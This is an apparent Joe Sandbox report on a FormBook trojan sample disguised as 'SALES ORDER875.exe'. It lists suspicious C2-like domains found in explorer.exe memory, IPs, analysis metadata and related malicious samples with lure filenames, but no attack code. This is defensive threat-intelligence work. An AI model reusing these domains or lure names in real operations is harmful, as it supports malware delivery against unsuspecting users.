                                                                                        http://www.cillascrewedsedroth.cfd/ge07/explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://www.ithin-ksvodn.xyzexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.ithin-ksvodn.xyzReferer:explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://www.ivglass.xyz/ge07/www.pm-22-ns-2.clickexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.ithin-ksvodn.xyz/ge07/explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.zoc-marriage.xyzReferer:explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://www.f7y2i9fgm.xyz/ge07/explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://www.cillascrewedsedroth.cfdReferer:explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://www.lasterdeals.shop/ge07/www.rkgexg.topexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://outlook.com_explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.iscinddocenaemlynne.cfd/ge07/explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://www.pm-22-ns-2.clickexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://www.ecurityemployment.todayexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://www.ecurityemployment.today/ge07/www.f7y2i9fgm.xyzexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://www.ool-covers76.xyz/ge07/explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://www.lasterdeals.shopReferer:explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://www.9net88.netReferer:explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://powerpoint.office.comcemberexplorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://www.yegle.net/ge07/www.giyztm.xyzexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://www.ool-covers76.xyz/ge07/www.9net88.netexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.pipagtxcorrelo.xyzexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.pm-22-ns-2.click/ge07/www.cillascrewedsedroth.cfdexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://www.pipagtxcorrelo.xyzReferer:explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://schemas.microexplorer.exe, 00000003.00000002.4134940464.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4134269586.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1845690815.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://www.cillascrewedsedroth.cfdexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.9net88.net/ge07/explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://www.ool-covers76.xyzReferer:explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://api.msn.com/qexplorer.exe, 00000003.00000002.4135604265.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.cillascrewedsedroth.cfd/ge07/www.ithin-ksvodn.xyzexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://www.ocockbowerlybrawer.cfdReferer:explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://www.giyztm.xyzexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://www.iscinddocenaemlynne.cfdexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://www.pm-22-ns-2.clickReferer:explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://www.iscinddocenaemlynne.cfd/ge07/www.zoc-marriage.xyzexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.ecurityemployment.todayReferer:explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.f7y2i9fgm.xyzReferer:explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.rkgexg.top/ge07/explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.iscinddocenaemlynne.cfdReferer:explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://aka.ms/Vh5j3kexplorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            http://www.ocockbowerlybrawer.cfd/ge07/www.ool-covers76.xyzexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://www.lasterdeals.shopexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://www.9net88.net/ge07/www.yegle.netexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                  216.239.32.52
                                                                                                                                                                                  yegle.netUnited States
                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                  199.59.243.227
                                                                                                                                                                                  94950.bodis.comUnited States
                                                                                                                                                                                  395082BODIS-NJUStrue
                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                  Analysis ID:1546714
                                                                                                                                                                                  Start date and time:2024-11-01 14:06:04 +01:00
                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                  Overall analysis duration:0h 10m 21s
                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                  Report type:full
                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                  Number of analysed new started processes analysed:9
                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                                                                  Technologies:
                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                  Sample name:SALES ORDER875.exe
                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                  Classification:mal100.troj.evad.winEXE@8/1@10/2
                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                                                  • Number of executed functions: 45
                                                                                                                                                                                  • Number of non-executed functions: 300
                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                  • VT rate limit hit for: SALES ORDER875.exe
                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                  09:07:55API Interceptor6947095x Sleep call for process: netsh.exe modified
                                                                                                                                                                                  09:07:59API Interceptor8066285x Sleep call for process: explorer.exe modified
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  199.59.243.227draft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.deepfy.xyz/t7p4/
                                                                                                                                                                                  VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.662-home-nb.shop/90v4/
                                                                                                                                                                                  NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.rebel.tienda/7n9v/
                                                                                                                                                                                  SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.migraine-massages.pro/ym43/?1Do0qp=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRaIpZZY1Y+O2jmybRXdJyK6xs6rkJOg==&yNNX=snRp
                                                                                                                                                                                  #10302024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.migraine-massages.pro/ym43/
                                                                                                                                                                                  18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.rebel.tienda/7n9v/
                                                                                                                                                                                  WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                  • www.allforai.xyz/puo4/
                                                                                                                                                                                  Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.297676.com/xyex/
                                                                                                                                                                                  Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.297676.com/xyex/
                                                                                                                                                                                  HSBC Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.dating-apps-il-dn5.xyz/u67c/
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  94950.bodis.comInvoice & Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  OVERDUE BALANCE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  Enquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.226
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  BODIS-NJUSdraft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  #10302024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
